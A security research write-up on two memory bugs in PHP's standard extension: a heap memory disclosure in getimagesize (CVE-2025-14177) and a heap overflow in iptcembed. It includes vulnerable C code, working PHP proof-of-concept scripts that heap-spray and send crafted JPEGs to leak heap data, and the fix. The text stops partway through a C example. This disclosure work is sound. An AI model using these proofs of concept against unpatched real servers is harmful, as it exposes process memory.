Hack the Elephant One Bite at a Time: JPEG-Related Memory-Safety Bugs in PHP

PHP is one of the world’s most popular programming languages. The PHP core itself is rarely perceived as an attack surface — attention usually shifts to frameworks and third-party libraries. However, a significant portion of real-world application logic relies on built-in functions from the ext/standard extension, which handles strings, query parameters, data formats, and files. During our research into the C code of this extension, we discovered several memory management bugs. In this article, we take a deep dive into two of them: a heap memory disclosure in getimagesize and a heap buffer overflow in iptcembed.

Key components and their roles

Zend Engine is the open-source C core of PHP, responsible for interpreting and executing PHP code. When checking your PHP version, you will typically see mentions of both Zend Engine and Zend OPcache.

Zend Version

$ ./sapi/cli/php -v
PHP 8.6.0-dev (cli) (built: Dec 11 2025 15:18:13) (NTS DEBUG)
Copyright (c) The PHP Group
Zend Engine v4.6.0-dev, Copyright (c) Zend Technologies
with Zend OPcache v8.6.0-dev, Copyright (c), by Zend Technologies

In simplified terms, Zend Engine consists of the following components:

Zend VM: the PHP execution subsystem that includes two key components. It acts as the execution “engine,” interpreting instructions, managing the call stack, executing operations (conditions, loops, functions), and calling extension functions. From PHP 8 onwards, Just-In-Time (JIT) compilation offers additional optimization in certain configurations.
- Zend Compiler: converts PHP code into an internal representation understood by the virtual machine. This initial phase utilizes a lexer (tokenization) and a parser (building the syntactic structure), followed by preparation for execution.
- Zend Executor: the opcode executor (the runtime part of the Zend VM). It iterates through op_array, creates and/or updates call frames, manages execute_data, executes built-in and user-defined functions, and switches between opcode handlers. In the source code, this logic resides primarily in zend_execute.c and generated VM handlers.
Zend Memory Manager: the memory manager for the PHP runtime. It handles memory allocation and deallocation (emalloc/efree) for variables, arrays, and objects, whose lifetime is governed by reference counting backed by the cycle-collecting garbage collector. It is optimized for request-bound allocations, which are released in bulk at the end of each request.
Zend API (Zend application programming interface): a set of internal Zend Engine APIs for writing C extensions (modules). It is used to register functions and classes, define data structures and object handlers, work with zvals, and so on. Essentially, it serves as the interface for connecting to the engine to add new capabilities (for example, database drivers).
Zend Optimizer+ (OPcache): an extension that caches the compilation results of PHP scripts (opcodes within an op_array) in shared memory so that subsequent requests don’t require recompiling the source code. While not strictly part of the core Zend VM interpreter, it usually ships with PHP and is enabled in production environments.
Zend Garbage Collector: the cycle-collecting garbage collector in Zend Engine. While PHP’s primary memory management model relies on reference counting, the GC additionally identifies and frees objects and arrays that form circular references and thus cannot be freed by refcount alone.

How it works: from PHP code to execution result

The execution lifecycle of a PHP script within the interpreter can be simplified into three major phases: tokenization → parsing and compilation → execution (see the diagram below).

Entry via SAPI: execution always begins with the server API (SAPI). This layer connects the PHP engine to the environment—whether it’s a web server (via an Apache module or PHP-FPM using FastCGI) or the Command Line Interface (CLI). The SAPI receives the request or command, initializes execution, configures output, headers, limits, and the environment, and then passes control to the Zend Engine.
PHP Source Code: the engine receives the script text (from a file or string) as input for compilation or caching, and subsequent execution.
OPcache (if enabled): this serves as the fast path. Before re-parsing the PHP source code, the Zend Engine checks OPcache. This boosts performance: a precompiled set of opcodes, packed into an op_array, is stored in shared memory, avoiding the need to repeatedly read, parse, and compile the source file on every request.
- Cache hit: the engine immediately retrieves the ready op_array and proceeds to execution.
- Cache miss: tokenization, parsing, and compilation are performed, after which the result is saved to OPcache.
Tokenizer (lexer): converts the stream of PHP source code characters into a sequence of tokens (keywords, identifiers, literals, and so on). This serves as the “raw material” for syntax analysis.
Parser: builds the abstract syntax tree (AST). The AST represents the program’s structural tree (expressions, statements, declarations). In modern PHP versions, the AST is a distinct stage that separates syntactic parsing from the generation of executable instructions.
Zend Compiler: translates the AST into PHP’s internal executable representation, the op_array structure. It contains opcodes (Zend VM instructions) together with associated data such as constants, literals, and other runtime metadata.
Zend Executor (part of Zend VM): interprets opcodes and executes the program (branching, function calls, value operations, exception handling, and so on). During execution, the engine calls built-in functions and C-extension functions, and interacts with the OS via files, networks, processes, and other environmental subsystems.
- Memory and garbage collection: during a request, memory is typically allocated via Zend Memory Manager (optimized for request-bound allocations). The Garbage Collector handles circular references: the cycle-finding algorithm doesn’t run continuously but triggers upon reaching specific thresholds (for example, when the root buffer is full).
- JIT (optional; part of OPcache): if JIT is enabled, the execution of “hot” code fragments may partially shift from opcode interpretation to native code. Note: in PHP’s implementation, JIT is part of OPcache and uses an additional shared memory area to store machine code; entry points are linked to the op_array and opcodes.
Result via SAPI: the execution outcome is returned to the external environment via the SAPI. This could be an HTTP response or console output, as well as errors, exit codes, and other side effects.

Standard extension

Standard extension (php-src/ext/standard) is a foundational PHP extension that provides the majority of out-of-the-box functions. In a typical build, this extension is compiled alongside the interpreter and registers hundreds of procedural APIs: string and array utilities, URL and HTTP helpers, file operations, stream wrappers, and code for parsing specific data formats (for example, processing JPEG metadata using the getimagesize function).
From a security standpoint, this is one of the most sensitive areas. The C code in ext/standard regularly processes uncontrolled input (files, request payloads, parameters) and is invoked by widely used PHP primitives. Consequently, vulnerabilities and bugs here often have a massive blast radius.

Detected issues

Memory disclosure when reading JPEG APP segments in the getimagesize function

💥 Security issue, CVE-2025-14177, moderate, 6.3 out of 10

Description

In November 2025, a bug was discovered in the standard extension: calling the built-in getimagesize function could return JPEG APP segment data (for example, APP1) padded with uninitialized heap bytes. We disclosed this to the vendor, and following their deeper analysis, the flaw was classified as a vulnerability and assigned CVE-2025-14177.

Background
The getimagesize function determines the size of a supported image file and returns its dimensions, file type, MIME type, and the height="..." width="..." string that can be used for an HTML IMG tag. Additionally, via the image_info parameter, it can return extended information, such as JPG APP markers. This mechanism is only supported for JFIF files.
Function interface:
getimagesize(string $filename, array &$image_info = null): array|false

The core of the issue was that, under certain conditions, the APPn data returned via the image_info parameter ($info in our examples) did not match the actual segment content in the file. In practice, two effects were observed:

Each subsequent chunk was written to the beginning of the buffer; as a result, the first bytes of $info['APPn'] corresponded to the last read chunk.
The tail of the returned string (the portion of the buffer that was never populated) could contain uninitialized bytes—remnants of previous heap data.

This is a classic memory disclosure vulnerability. If an application processes an image and then exposes $info['APPn'] (for example, by returning extracted metadata to the user or writing it into user-visible files), fragments of process memory can leak. Importantly, exploitation requires the segment to be read in multiple chunks.

An APP segment (application segment) is a type of JPEG segment that carries metadata or auxiliary information:

EXIF data (shooting parameters, GPS coordinates, and more)
IPTC information (authorship, keywords)
Comments
Creator information (camera, editing software)

A JPEG file begins with the SOI (Start of Image) marker 0xFFD8, followed by a sequence of segments, and ends with the EOI (End of Image) marker 0xFFD9.

APP segments (APP0–APP15) are metadata sections with markers 0xFFE0…0xFFEF containing specific data formats (for example, EXIF, XMP). Each APP segment consists of the 2-byte marker, a 2-byte big-endian length field, and the payload; the length counts its own two bytes but not the marker. In our case, APP1 (0xFFE1) is the relevant segment: it typically holds EXIF and XMP data, and it is the segment our proofs of concept use to trigger the bug.
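The segment layout can be illustrated with a small walker over an in-memory JPEG. This is a minimal sketch, not php-src code: read_be16 and count_app_segments are hypothetical helpers, and the walker deliberately ignores fill bytes and standalone markers such as RSTn. It uses the same length arithmetic php_read_APP relies on: the stored length includes its own two bytes, so the payload is length - 2 bytes.

```c
#include <stddef.h>
#include <stdio.h>

/* JPEG stores segment lengths as 16-bit big-endian values. */
static unsigned read_be16(const unsigned char *p)
{
    return ((unsigned)p[0] << 8) | p[1];
}

/*
 * Walk the segments of an in-memory JPEG and print every APPn segment
 * (markers 0xFFE0..0xFFEF). Returns the number of APPn segments seen,
 * or -1 if the data is malformed. Simplified: stops at SOS (0xFFDA) or
 * EOI (0xFFD9) and does not handle fill bytes or standalone markers.
 */
static int count_app_segments(const unsigned char *jpeg, size_t size)
{
    size_t pos = 2;                       /* skip SOI (0xFFD8) */
    int apps = 0;

    if (size < 2 || jpeg[0] != 0xFF || jpeg[1] != 0xD8)
        return -1;

    while (pos + 4 <= size) {             /* marker (2) + length (2) */
        if (jpeg[pos] != 0xFF)
            return -1;
        unsigned marker = jpeg[pos + 1];
        if (marker == 0xD9 || marker == 0xDA)
            break;
        /* The length counts its own 2 bytes, but not the marker. */
        unsigned length = read_be16(jpeg + pos + 2);
        if (length < 2 || pos + 2 + length > size)
            return -1;
        if (marker >= 0xE0 && marker <= 0xEF) {
            printf("APP%u: %u payload bytes\n", marker - 0xE0, length - 2);
            apps++;
        }
        pos += 2 + (size_t)length;        /* skip marker, length field, payload */
    }
    return apps;
}
```

For a file shaped like the proofs of concept (SOI, APP0, APP1, SOF0, EOI), the walker reports two APP segments; a truncated APP1 whose length points past the end of the data is rejected with -1.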

The purpose of APP markers in JPEG images is listed in the table below.

MARKER	HEX	PURPOSE
APP0	`0xFFE0`	JFIF / JFXX (thumbnail extension)
APP1	`0xFFE1`	Exif / XMP
APP2	`0xFFE2`	ICC profile / FlashPix extensions (FPXR)
APP3	`0xFFE3`	(not standardized)
APP4	`0xFFE4`	(not standardized)
APP5	`0xFFE5`	(not standardized)
APP6	`0xFFE6`	(not standardized)
APP7	`0xFFE7`	(not standardized)
APP8	`0xFFE8`	SPIFF (Still Picture Interchange File Format)
APP9	`0xFFE9`	(not standardized)
APP10	`0xFFEA`	(not standardized)
APP11	`0xFFEB`	(not standardized)
APP12	`0xFFEC`	Picture Info / Ducky
APP13	`0xFFED`	Photoshop Image Resources (8BIM), including IPTC
APP14	`0xFFEE`	Adobe
APP15	`0xFFEF`	(not standardized)

Technical details

Root cause: incorrect chunk concatenation in php_read_stream_all_chunks

The issue resided in the php_read_APP function and its reading helper, php_read_stream_all_chunks (php-src/ext/standard/image.c). The idea behind php_read_APP is straightforward: the length of the APP segment is known, so PHP allocates a buffer of N bytes, reads the payload from the stream into it, and then returns the data in $info['APPn']. What makes any reading bug here dangerous is that emalloc, like malloc, returns uninitialized memory: bytes that are never written to buffer still end up in $info['APPn'] via the add_assoc_stringl function.

Function php_read_APP (php-src/ext/standard/image.c)

static int php_read_APP(php_stream * stream, unsigned int marker, zval *info)
{
	size_t length;
	char *buffer;
	char markername[16];
	zval *tmp;

	length = php_read2(stream);
	if (length < 2)	{
		return 0;
	}
	length -= 2;				/* length includes itself */

	buffer = emalloc(length);

	if (php_read_stream_all_chunks(stream, buffer, length) != length) {
		efree(buffer);
		return 0;
	}

	snprintf(markername, sizeof(markername), "APP%d", marker - M_APP0);

	if ((tmp = zend_hash_str_find(Z_ARRVAL_P(info), markername, strlen(markername))) == NULL) {
		/* XXX we only catch the 1st tag of it's kind! */
		add_assoc_stringl(info, markername, buffer, length);
	}

	efree(buffer);
	return 1;
}

The bug stemmed from how chunks were concatenated when reading from the stream. In php_read_stream_all_chunks, the read_total counter was incremented, but every php_stream_read call wrote to the same destination address (buffer), without applying an offset for the bytes already read.

The function php_read_stream_all_chunks (php-src/ext/standard/image.c)

static size_t php_read_stream_all_chunks(php_stream *stream, char *buffer, size_t length)
{
	size_t read_total = 0;
	do {
		ssize_t read_now = php_stream_read(stream, buffer, length - read_total);
		read_total += read_now;
		if (read_now < stream->chunk_size && read_total != length) {
			return 0;
		}
	} while (read_total < length);

	return read_total;
}

Let’s look at an example where length = 9000 and chunk_size = 8192:

The first php_stream_read reads 8192 bytes and writes to buffer[0..8191].
The second php_stream_read reads 808 bytes and writes to buffer[0..807] (overwriting the beginning of the buffer).
The range buffer[8192..8999] is never written.

Result: the php_read_APP function considers the read successful and copies length bytes into $info['APPn'], even though the start of the buffer was overwritten by the last chunk, and the tail remains uninitialized, containing garbage data.
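The length = 9000 example can be replayed outside PHP with a mock stream. In this sketch, mock_stream, mock_read, buggy_read_all, and simulate are hypothetical names; only the loop body of buggy_read_all mirrors php_read_stream_all_chunks, and the 0xAA filler stands in for whatever stale data the heap happened to contain.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

/* Hypothetical stand-in for php_stream: hands out at most chunk_size bytes per read. */
struct mock_stream {
    const unsigned char *data;
    size_t len, pos, chunk_size;
};

static ssize_t mock_read(struct mock_stream *s, unsigned char *dst, size_t n)
{
    size_t avail = s->len - s->pos;
    if (n > s->chunk_size) n = s->chunk_size;
    if (n > avail) n = avail;
    memcpy(dst, s->data + s->pos, n);
    s->pos += n;
    return (ssize_t)n;
}

/* Same control flow as the vulnerable php_read_stream_all_chunks():
 * every read targets `buffer`, never `buffer + read_total`. */
static size_t buggy_read_all(struct mock_stream *s, unsigned char *buffer, size_t length)
{
    size_t read_total = 0;
    do {
        ssize_t read_now = mock_read(s, buffer, length - read_total);
        read_total += (size_t)read_now;
        if ((size_t)read_now < s->chunk_size && read_total != length)
            return 0;
    } while (read_total < length);
    return read_total;
}

/* Fill src with 'A' for the first chunk and 'X' afterwards, pre-fill dst with
 * 0xAA ("stale heap"), then run the buggy loop. Both arrays hold `length` bytes.
 * Returns the total the loop claims to have read. */
static size_t simulate(unsigned char *src, unsigned char *dst, size_t length, size_t chunk_size)
{
    for (size_t i = 0; i < length; i++)
        src[i] = (i < chunk_size) ? 'A' : 'X';
    memset(dst, 0xAA, length);
    struct mock_stream s = { src, length, 0, chunk_size };
    return buggy_read_all(&s, dst, length);
}
```

With length = 9000 and chunk_size = 8192, the loop reports 9000 bytes read, yet dst[0..807] holds the second chunk ('X'), dst[808..8191] still holds the first ('A'), and dst[8192..8999] keeps the 0xAA filler.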

From a public issue to a security issue with the subsequent assignment of a CVE identifier

Initially, the problem appeared to manifest only in a rare scenario involving stream filters. However, while fixing it, the vendor discovered a crucial detail: filters were not a strict prerequisite.

In the vendor’s words: “This issue was originally not classified as a security issue due to usage of stream filter in recreation of the issue and the fact that only realy image file is supposed to be used. However, after deeper investigation during the fix, it was discovered that this can be exploitable if attacker knows the stream chunk size (which is mostly default) even on normal image. Such attack would be more complex but possible.”

The key trigger is predictable chunking. If an attacker knows the read chunk size (which is the default value in many configurations), they could theoretically craft an input JPEG file to achieve this effect even on a standard image. As a result, the bug was reclassified as a vulnerability and a security advisory was issued. The vulnerability was assigned CVE-2025-14177.

Exploitation

During the triage process, we developed two proofs of concept (PoCs). They are presented below in the chronological order of our correspondence with the vendor.

Proof of concept 1 (original report): reproduction via php://filter. This is the minimal reproduction we initially prepared and submitted to the developers. It reads the file via php://filter to force the runtime to read the APP1 segment in multiple chunks. The filter itself is not a prerequisite for the vulnerability; it simply serves as a convenient way to trigger the bug reliably.

Following the vendor’s feedback and further analysis, it became clear that the issue is not limited to the use of filters: any scenario where reading occurs in chunks and the attacker can account for the chunk size (often the default value) is sufficient. This led to Proof of concept 2 (post-feedback): reproduction without filters in a web-like scenario. This filterless variant more closely mimics a real-world web application (such as one reading an upload from php://input), where multi-chunk reading is achieved by controlling the timing of the data fed into the stream.

Proof of concept 1. Original report. Reproduction via php://filter.

This PoC performs the following steps:

Generates a minimal valid JPEG with a large APP1 segment, ensuring the payload is read across multiple chunks.
Populates a section of heap memory with a specific marker and then frees it. If the marker later appears in the returned data, freed heap memory has been disclosed.
Reads the file using php://filter to force multi-chunk reads.
Compares the expected payload against the data returned in $info['APP1'] (specifically looking for the leaked marker at the tail end of the payload).

Below is the initial PHP script used for this:

<?php
// Minimal PoC: corruption/uninitialized memory leak when reading APP1 via php://filter

$file = __DIR__ . '/min.jpg';

// Make APP1 large enough so it is read in multiple chunks
$chunk = 8192;
$tail  = 123;
$payload = str_repeat('A', $chunk) . str_repeat('B', $chunk) . str_repeat('X', $tail);
$app1Len = 2 + strlen($payload);

// Minimal JPEG: SOI + APP1 + SOF0(1x1) + EOI
$sof  = "\xFF\xC0" . pack('n', 11) . "\x08" . pack('n',1) . pack('n',1) . "\x01\x11\x00";
$jpeg = "\xFF\xD8" . "\xFF\xE1" . pack('n', $app1Len) . $payload . $sof . "\xFF\xD9";
file_put_contents($file, $jpeg);

// Mini heap-spray: fill heap with a marker and free it, so the C buffer
// can reuse those areas and return marker remnants in $info['APP1']
$marker = 'LEAK-MARKER-123!';
$spr = substr(str_repeat($marker, intdiv(strlen($payload) + strlen($marker) - 1, strlen($marker))), 0, strlen($payload));
$spray = [];
for ($i = 0; $i < 512; $i++) {
  $x = $spr; $x[0] = chr($i & 0x7F); // Copy on write -> distinct allocations
  $spray[$i] = $x;
}
unset($spray, $x);
gc_collect_cycles();

// Read through a filter to enforce multiple reads
$src = 'php://filter/read=string.rot13|string.rot13/resource=' . $file;
$info = null;
if (!@getimagesize($src, $info) || !isset($info['APP1'])) {
  echo "Error: failed to obtain APP1 from getimagesize().\n";
  exit(1);
}

$exp = $payload;
$ret = $info['APP1'];

// Human-readable output
$lenExp = strlen($exp);
$lenRet = strlen($ret);
echo "APP1 length: expected=$lenExp, actual=$lenRet\n";
echo "Expected APP1 head (HEX): ", bin2hex(substr($exp, 0, 16)), "\n";
echo "Returned APP1 head (HEX): ", bin2hex(substr($ret, 0, 16)), "\n";
echo ($exp === $ret)
  ? "Result: OK - data matches.\n"
  : "Result: VULNERABLE - data differs (corruption/leak).\n";

// If found - show marker offset and a short snippet
$pos = strpos($ret, $marker);
if ($pos !== false) {
  echo "Leak marker found: offset=$pos (inside returned APP1).\n";
  $ctx = 12; // bytes of context left/right
  $start = max(0, $pos - $ctx);
  $end = min(strlen($ret), $pos + strlen($marker) + $ctx);
  $before = substr($ret, $start, $pos - $start);
  $mid    = substr($ret, $pos, strlen($marker));
  $after  = substr($ret, $pos + strlen($marker), $end - ($pos + strlen($marker)));

  $sanitize = function ($s) {
    return preg_replace('/[^\x20-\x7E]/', '.', $s);
  };
  $asciiLine = $sanitize($before) . '[' . $mid . ']' . $sanitize($after);
  $hexLine = bin2hex($before) . '[' . bin2hex($mid) . ']' . bin2hex($after);

  echo "Snippet with marker (ASCII, marker in []): ", $asciiLine, "\n";
  echo "Snippet with marker (HEX, marker in []):   ", $hexLine, "\n";
} else if ($exp !== $ret) {
  echo "Marker not found, but data differs - still indicates a read bug.\n";
}

During the script’s execution, a JPEG image is generated:

$ xxd min.jpg
00000000: ffd8 ffe1 407d 4141 4141 4141 4141 4141  ....@}AAAAAAAAAA
00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
00000020: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
........: .... .... .... .... .... .... .... ....  ................
00002000: 4141 4141 4141 4242 4242 4242 4242 4242  AAAAAABBBBBBBBBB
00002010: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
00002020: 4242 4242 4242 4242 4242 4242 4242 4242  BBBBBBBBBBBBBBBB
........: .... .... .... .... .... .... .... ....  ................
00004000: 4242 4242 4242 5858 5858 5858 5858 5858  BBBBBBXXXXXXXXXX
00004010: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004020: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004030: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004040: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004050: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004060: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004070: 5858 5858 5858 5858 5858 5858 5858 5858  XXXXXXXXXXXXXXXX
00004080: 58ff c000 0b08 0001 0001 0111 00ff d9    X..............

Running the script confirms that the returned APP1 data contains heap contents that should have remained inaccessible:

$ ./php cli.php
APP1 length: expected=16507, actual=16507
Expected APP1 head (HEX): 41414141414141414141414141414141
Returned APP1 head (HEX): 4242424242425a5a5a5a5a5a5a5a5a5a
Result: VULNERABLE - data differs (corruption/leak).
Leak marker found: offset=16392 (inside returned APP1).
Snippet with marker (ASCII, marker in []): -MARKER-123![LEAK-MARKER-123!]LEAK-MARKER-
Snippet with marker (HEX, marker in []):   2d4d41524b45522d31323321[4c45414b2d4d41524b45522d31323321]4c45414b2d4d41524b45522d

Proof of concept 2. Post-feedback. Reproduction without filters, web-like scenario

To demonstrate a scenario commonly encountered in web APIs (where an image is sent in the raw request body rather than as multipart/form-data), we developed a PoC consisting of two compact scripts:

1. The webapp.php script simulates an upload handler. It reads a JPEG from the request body (php://input, or php://stdin in the CLI) and calls getimagesize(..., $info).

<?php

const CHUNK_SIZE = 8192;
const PAYLOAD_LEN = 9000;
const MARKER = 'LEAK-MARKER-123!';

function heap_spray(int $len, string $marker): void
{
  $spr = substr(str_repeat($marker, intdiv($len + strlen($marker) - 1, strlen($marker))), 0, $len);
  $tmp = [];
  for ($i = 0; $i < 512; $i++) {
    $x = $spr;
    $x[0] = chr($i & 0x7F);
    $tmp[$i] = $x;
  }
  unset($tmp, $x);
  gc_collect_cycles();
}

function sanitize_ascii(string $s): string
{
  return preg_replace('/[^\x20-\x7E]/', '.', $s);
}

$src = (PHP_SAPI === 'cli' || PHP_SAPI === 'phpdbg') ? 'php://stdin' : 'php://input';
heap_spray(PAYLOAD_LEN, MARKER);

$info = null;
if (!@getimagesize($src, $info) || !is_array($info) || !isset($info['APP1'])) {
  echo "Error: getimagesize() failed or missing APP1.\n";
  if (is_array($info)) {
    echo "Keys: ", implode(', ', array_keys($info)), "\n";
  }
  exit(1);
}

$app1 = $info['APP1'];
if (str_starts_with($app1, "Exif\0\0")) {
  echo "Result: OK (APP1 starts with Exif)\n";
  exit(0);
}

echo "Result: VULNERABLE (APP1 does not start with Exif)\n";

$pos = strpos($app1, MARKER);
if ($pos !== false) {
  $ctx = 12;
  $start = max(0, $pos - $ctx);
  $end = min(strlen($app1), $pos + strlen(MARKER) + $ctx);
  $before = substr($app1, $start, $pos - $start);
  $mid = substr($app1, $pos, strlen(MARKER));
  $after = substr($app1, $pos + strlen(MARKER), $end - ($pos + strlen(MARKER)));

  echo "Snippet (ASCII): ", sanitize_ascii($before), '[', $mid, ']', sanitize_ascii($after), "\n";
} else {
  echo "Marker not found (still indicates corruption/uninitialized tail).\n";
}

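2. The attacker.php script generates a valid JPEG with a large APP1 segment and transmits it in two stages: first, it sends the file prefix up to and including the APP1 length field; then, after a brief pause, it sends the remainder of the file. The pause matters because php_read_stream_all_chunks treats any read shorter than chunk_size as a failure unless it completes the segment. As far as we can tell, delivering the 24-byte prefix separately keeps it from sharing a read with the payload, so the 9000-byte payload arrives as one full 8192-byte chunk followed by an 808-byte one: exactly the multi-chunk pattern that triggers the bug when the chunk size is known (8192 bytes by default).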

<?php

const CHUNK_SIZE = 8192;
const PAYLOAD_LEN = 9000;
const SLEEP_US = 50_000;

function build_jpeg_with_app1(string $app1Payload): string
{
  $app0 = "\xFF\xE0" . pack('n', 16) . "JFIF\0" . "\x01\x01" . "\x00" . pack('n', 1) . pack('n', 1) . "\x00\x00";
  $sof = "\xFF\xC0" . pack('n', 11) . "\x08" . pack('n', 1) . pack('n', 1) . "\x01\x11\x00";
  $app1Len = 2 + strlen($app1Payload);
  return "\xFF\xD8" . $app0 . "\xFF\xE1" . pack('n', $app1Len) . $app1Payload . $sof . "\xFF\xD9";
}

if (PAYLOAD_LEN <= CHUNK_SIZE || PAYLOAD_LEN > 0xFFFF - 2) {
  fwrite(STDERR, "Invalid PAYLOAD_LEN\n");
  exit(2);
}

$payload = "Exif\0\0" . str_repeat('A', CHUNK_SIZE - 6) . str_repeat('X', PAYLOAD_LEN - CHUNK_SIZE);
$jpeg = build_jpeg_with_app1($payload);

$app1MarkerPos = strpos($jpeg, "\xFF\xE1");
if ($app1MarkerPos === false) {
  fwrite(STDERR, "Failed to locate APP1 marker\n");
  exit(2);
}
$splitAt = $app1MarkerPos + 4;

fwrite(STDERR, "Sending JPEG in 2 phases: total=" . strlen($jpeg) . " split_at=$splitAt sleep_us=" . SLEEP_US . "\n");
fwrite(STDOUT, substr($jpeg, 0, $splitAt));
fflush(STDOUT);
usleep(SLEEP_US);
fwrite(STDOUT, substr($jpeg, $splitAt));
fflush(STDOUT);

For demonstration purposes, we use the CLI and run the two scripts in separate terminals connected by a named pipe (FIFO).

What is FIFO?
The mkfifo command creates a named pipe: a special file that lets two independent processes exchange bytes just like an ordinary pipe. Unlike a regular file, a FIFO does not store data on disk and has no meaningful file size. It behaves as a stream: opening it for reading blocks until a writer opens the other end, and read() blocks until data arrives.

Terminal 1. The webapp.php script

$ mkfifo /tmp/php-image-poc; ./php webapp.php < /tmp/php-image-poc
Result: VULNERABLE (APP1 does not start with Exif)
Snippet (ASCII): AAAAKER-123![LEAK-MARKER-123!]LEAK-MARKER-

Terminal 2. The attacker.php script

$ ./php attacker.php > /tmp/php-image-poc
Sending JPEG in 2 phases: total=9038 split_at=24 sleep_us=50000

The first terminal displays the output of the webapp.php script. The returned data reveals heap memory that should not have been accessible, confirming that the vulnerability is exploitable without stream filters.

Fix

The fix was highly targeted: after each read, the buffer pointer is now advanced (buffer += read_now), ensuring the next chunk is appended sequentially. This change was introduced in commit “Fix GH-20584” and accompanied by a regression test ext/standard/tests/image/gh20584.phpt.
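The corrected loop can be sketched as follows. This is our illustration of the idea behind the fix (advancing buffer by read_now), written against a hypothetical read callback (read_fn, mem_src, mem_read) rather than php_stream; the extra read_now <= 0 check is our own addition and not necessarily part of the upstream commit.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

/* Hypothetical reader interface standing in for php_stream_read(). */
typedef ssize_t (*read_fn)(void *ctx, char *dst, size_t n);

/* Corrected concatenation: each chunk lands at buffer + read_total. */
static size_t read_all_chunks(read_fn rd, void *ctx, size_t chunk_size,
                              char *buffer, size_t length)
{
    size_t read_total = 0;
    do {
        ssize_t read_now = rd(ctx, buffer, length - read_total);
        if (read_now <= 0)               /* our addition: EOF or error */
            return 0;
        buffer += read_now;              /* the fix: append, do not overwrite */
        read_total += (size_t)read_now;
        if ((size_t)read_now < chunk_size && read_total != length)
            return 0;                    /* short read before the end: fail */
    } while (read_total < length);
    return read_total;
}

/* Hypothetical in-memory source serving at most `chunk` bytes per call. */
struct mem_src {
    const char *data;
    size_t len, pos, chunk;
};

static ssize_t mem_read(void *ctx, char *dst, size_t n)
{
    struct mem_src *s = ctx;
    size_t avail = s->len - s->pos;
    if (n > s->chunk) n = s->chunk;
    if (n > avail) n = avail;
    memcpy(dst, s->data + s->pos, n);
    s->pos += n;
    return (ssize_t)n;
}
```

Reading 9000 bytes through mem_read with an 8192-byte chunk now reproduces the source exactly, while a source that ends early still makes the function return 0, matching the original error path.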

Heap buffer overflow in the iptcembed function

🐛 Public issue (https://github.com/php/php-src/issues/20582)

Description

This is a classic “measure once, read forever” trap. The function relies on a single fstat() result to calculate the heap buffer size, and then proceeds to read the byte stream until EOF.

Background
Heap buffer overflow occurs when data is written past the boundaries of an allocated block of dynamic memory on the heap.

The output buffer (spoolbuf) is pre-allocated based on the st_size value obtained via fstat(). Every byte read afterwards is appended to the buffer without any capacity check. For non-regular files such as FIFOs, st_size is 0 even though the stream can deliver an arbitrary amount of data, so once the input outgrows the fixed reserve, the writes run past the end of the heap buffer.

Background
TOCTOU (time-of-check to time-of-use) is a class of software vulnerability caused by a race condition. It occurs when a program checks the state of a resource (for example, a file’s size or access rights), but that state changes before the program actually uses the resource, for instance because an attacker modified it in between. This can lead to unpredictable behavior or enable exploitation.
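For a regular file, this check/use gap can be reproduced in a few lines. In the hypothetical demo below (toctou_demo is our name), the program appends to its own temporary file after calling fstat(), standing in for another process that grows the file; a buffer sized from the checked st_size would then be too small for what a read-until-EOF loop consumes.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <sys/stat.h>

/*
 * Hypothetical TOCTOU demo: measure the file with fstat() (time of check),
 * let it grow (we append ourselves, standing in for another process), then
 * read until EOF (time of use). Returns the bytes read, or -1 on error;
 * *checked receives the size seen at check time.
 */
static long toctou_demo(long *checked)
{
    FILE *fp = tmpfile();
    struct stat sb;
    long used = 0;

    if (!fp)
        return -1;
    fputs("0123456789", fp);                    /* 10 bytes */
    fflush(fp);
    if (fstat(fileno(fp), &sb) != 0) {
        fclose(fp);
        return -1;
    }
    *checked = (long)sb.st_size;                /* time of check */

    fputs("ABCDEFGHIJKLMNOPQRSTUVWXYZ", fp);    /* file grows: +26 bytes */
    fflush(fp);
    rewind(fp);

    while (getc(fp) != EOF)                     /* time of use: read to EOF */
        used++;
    fclose(fp);
    return used;
}
```

The demo sees 10 bytes at check time but consumes 36 at use time.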

Technical details

The function iptcembed (php-src/ext/standard/iptc.c) repacks a JPEG: it reads the input stream, parses markers (APP, SOS, and so on), and copies bytes into a new buffer (spoolbuf) while parsing, inserting or replacing the APP13 (IPTC) segment along the way.

Background
The iptcembed function is used to embed binary IPTC data into a JPEG image.
Function interface:
iptcembed(string $iptc_data, string $filename, int $spool = 0): string|bool

The fundamental flaw is that the output buffer size is determined only once at the start (based on the fstat result, sb.st_size), after which the code can keep copying input until EOF without verifying that there is free space left in the buffer. For non-regular files (such as FIFOs, pipes, sockets, and devices), st_size is typically 0 or does not reflect the actual volume of data. Even with regular files, there is a TOCTOU window: the file can grow after fstat but before reading completes.
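The st_size problem for non-regular files is easy to observe with an anonymous pipe, which fstat() reports as a FIFO. In this sketch (probe_pipe is a hypothetical helper), 4096 bytes go into the pipe and fstat() is then asked for the size of the read end; on Linux, st_size comes back as 0 even though all 4096 bytes can be read. Other systems may report different values, which is exactly why the size cannot be trusted.

```c
#define _POSIX_C_SOURCE 200809L
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Hypothetical probe: write n bytes (n <= 4096, small enough to fit in a pipe
 * buffer on common systems) into an anonymous pipe, then compare the size
 * fstat() reports for the read end with the bytes that can actually be read.
 * Returns 0 on success, -1 on error.
 */
static int probe_pipe(size_t n, int *is_fifo, long long *reported, size_t *readable)
{
    int fds[2];
    char buf[4096];
    struct stat sb;
    ssize_t r;

    if (n > sizeof buf || pipe(fds) != 0)
        return -1;
    memset(buf, 'A', n);
    if (write(fds[1], buf, n) != (ssize_t)n) {
        close(fds[0]);
        close(fds[1]);
        return -1;
    }
    close(fds[1]);                        /* no more writers: reader will hit EOF */

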